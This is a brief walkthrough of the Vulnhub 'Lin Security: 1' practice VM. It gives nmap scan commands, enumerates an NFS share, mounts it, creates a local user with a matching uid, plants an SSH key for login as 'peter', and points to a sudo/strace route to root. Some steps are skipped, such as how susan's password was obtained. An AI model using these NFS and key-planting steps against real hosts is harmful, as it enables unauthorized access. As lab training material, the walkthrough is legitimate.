LIN SECURITY:1 Vulnhub walkthrough

first download box using this link after downloading configure it on virtual box now scan port with nmap scanner

$ nmap -v -p- 192.168.43.124

now default script and version detection scan with nmap

$ sudo nmap -sC -sV -sT -sU -A -p 22,111,2049,36857,45819,46245,48735 192.168.43.124

we found nfs running on this vulnerable box now start nfs enumeration first we use showmount command for showing nfs share

$ showmount -e 192.168.43.124

peter directory share with nfs now we scan with nmap nfs script

$ sudo nmap -sC -sV -sT -sU -sT --script=nfs* -p 111,2049 192.168.43.124

now mount nfs share on local pc

$ sudo mount -t nfs 192.168.43.124:/home/peter /mnt/data

now add a user on your pc username=peter and userid=1001

$ sudo useradd --uid 1001 peter

now login with user peter and go on nfs share directory

# su peter

now you can create directory and file on nfs share now make directory .ssh and past authorized_keys file on .ssh directory

$ mkdir .ssh

genrate ssh-key using ssh-keygen command and past id_rsa.pub file on mount .ssh directory and replace name authorized_keys

$ ssh-keygen

now copy id_rsa.pub file content and paste on nfs mount .ssh directory

now make ssh connection with peter and we will successfully able to connect

$ ssh -i id_rsa peter@192.168.43.124

now we got susan user password let’s enumerate

try sudo -l on peter user

$ sudo -l

you can see more about strace binary on gtfobins using this link

now we got root user

happy hacking :)